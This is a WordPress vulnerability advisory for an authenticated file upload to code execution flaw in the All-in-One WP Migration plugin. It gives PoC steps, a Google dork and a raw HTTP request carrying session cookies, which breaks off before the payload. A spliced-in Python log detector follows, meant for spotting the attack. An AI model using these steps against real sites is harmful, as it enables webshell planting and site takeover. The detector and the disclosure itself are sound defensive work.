wpvulndb | YICHENG LIU_chenfeng lab | WPVDB-ID: 87C6052C-2628-4987-A9A3-A03B5CA1E083
History: Feb 07, 2022 - 12:00 a.m.

All-in-One WP Migration < 7.41 - Admin+ Arbitrary File Upload to RCE

2022-02-07 00:00:00
YICHENG LIU_chenfeng lab
wpscan.com
10

7.2 High (CVSS3)

Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

6.5 Medium (CVSS2)

Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

The plugin does not validate uploaded files’ extension, which allows administrators to upload PHP files on their site, even on multisite installations.

PoC

To reproduce:
- Log in, click All-in-One WP Migration > Import to use the "import from file" function.
- Intercept the wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 request.
- Change the parameters "upload-file", "storage" and "archive". Insert malicious PHP code into "upload-file". Submit the request.
- Access the URL below to execute system commands:
  wp-content/plugins/all-in-one-wp-migration/storage/[storage]/[archive]

# Exploit Title: WordPress All-in-One WP Migration Plugin - Arbitrary File Upload to Remote Code Execution
# Google Dork: inurl:/wp-admin/admin-ajax.php
# Date: 23/12/2020
# Exploit Author: YICHENGLIU_chenfeng lab
# Vendor Homepage: https://cn.wordpress.org/plugins/all-in-one-wp-migration/advanced/
# Version: All-in-One WP Migration <=7.38
# Tested on: windows 10(x64)
# data in http request:
POST example/wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1
Host: 192.168.9.240
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.9.240/WordPresscn/wp-admin/admin.php?page=ai1wm_import
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3937767834299093780715813797
Content-Length: 740
Origin: http://192.168.9.240
Connection: close
Cookie: wordpress_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Caeb6bc83b040df5b4acfbbaf7a18681cb06c3210046627978bad64d8419f06e6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_35a9534a308351ed3717c8a5ae6460b0=admin%7C1616316196%7Cw4f8i4PHSUNfb6q7qC1r6HiV1d78wA1LrdXcmbW51iV%7Cc6d2ef5724f21ca0e0cc446643f6f8d68c900452b87b412b2eb7282c32161846; wp-settings-time-1=1616143799
-----------------------------3937767834299093780715813797
Content-Disposition: form-data; name="upload-file"; filename="shell.wpress"
Content-Type: application/octet-stream
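A defender-side complement to the PoC above, added here as an example that is neither part of the advisory nor code from the plugin: it walks web-server access-log lines, notes which client IPs issued the admin-ajax `ai1wm_import` call named in the PoC, and flags any later request for a PHP-handled file below the plugin's `storage/` tree (the location the PoC says the uploaded file is reached from). The log lines, the IPs and the file names are constructed for the example, and the extension list is an assumption to be matched to the server's PHP handler configuration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined"-style line: ip - - [time] "METHOD target HTTP/x" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Plugin storage tree named in the advisory. A site may live in a subdirectory,
# so the prefix is searched for anywhere in the path, not only at the start.
STORAGE_PREFIX = "/wp-content/plugins/all-in-one-wp-migration/storage/"

# Extensions a web server typically hands to the PHP interpreter.
# Assumption: adjust to the handler configuration of the server being monitored.
PHP_EXTENSIONS = (".php", ".phtml", ".phar")


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec.pop("target"))
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def is_import_request(rec):
    """The admin-ajax import call the advisory's PoC sends."""
    return (rec["method"] == "POST"
            and rec["path"].endswith("/wp-admin/admin-ajax.php")
            and rec["query"].get("action") == ["ai1wm_import"])


def is_storage_php_hit(rec):
    """A request for a PHP-handled file anywhere below the plugin storage tree."""
    path = rec["path"].lower()
    idx = path.find(STORAGE_PREFIX)
    if idx < 0:
        return False
    tail = path[idx + len(STORAGE_PREFIX):]
    # Check every segment so that /x.php/extra (PATH_INFO) is caught as well.
    return any(seg.endswith(PHP_EXTENSIONS) for seg in tail.split("/") if seg)


def detect(lines):
    """Return one finding per PHP hit under storage, noting whether the same
    client IP issued an import request earlier in the log."""
    importers = set()
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if is_import_request(rec):
            importers.add(rec["ip"])
        if is_storage_php_hit(rec):
            findings.append({
                "ip": rec["ip"],
                "time": rec["time"],
                "path": rec["path"],
                "status": rec["status"],
                "preceded_by_import": rec["ip"] in importers,
            })
    return findings


# Constructed sample log (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [07/Feb/2022:10:00:01 +0000] "GET /wp-admin/admin.php?page=ai1wm_import HTTP/1.1" 200 5120
10.0.0.5 - - [07/Feb/2022:10:00:09 +0000] "POST /wp-admin/admin-ajax.php?action=ai1wm_import&ai1wm_import=1 HTTP/1.1" 200 312
10.0.0.5 - - [07/Feb/2022:10:00:20 +0000] "GET /wp-content/plugins/all-in-one-wp-migration/storage/abc123/dropped.php HTTP/1.1" 200 88
10.0.0.9 - - [07/Feb/2022:10:05:00 +0000] "GET /wp-content/plugins/all-in-one-wp-migration/storage/abc123/backup.wpress HTTP/1.1" 200 9000000
10.0.0.9 - - [07/Feb/2022:10:06:00 +0000] "GET /blog/wp-content/plugins/all-in-one-wp-migration/storage/probe.PHP/x HTTP/1.1" 404 196
"""


def demo():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On the sample, the `.wpress` archive download is ignored, the `dropped.php` request is reported with `preceded_by_import` set because the same IP had just called the import endpoint, and the 404 probe from the other IP is still reported (with its status) so that reconnaissance against the storage tree is visible too. A 200 on a PHP file under `storage/` is the condition worth alerting on; an import followed by such a hit from the same client is the sequence the PoC produces.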

CPE

Name                      Operator  Version
all-in-one-wp-migration   lt        7.41
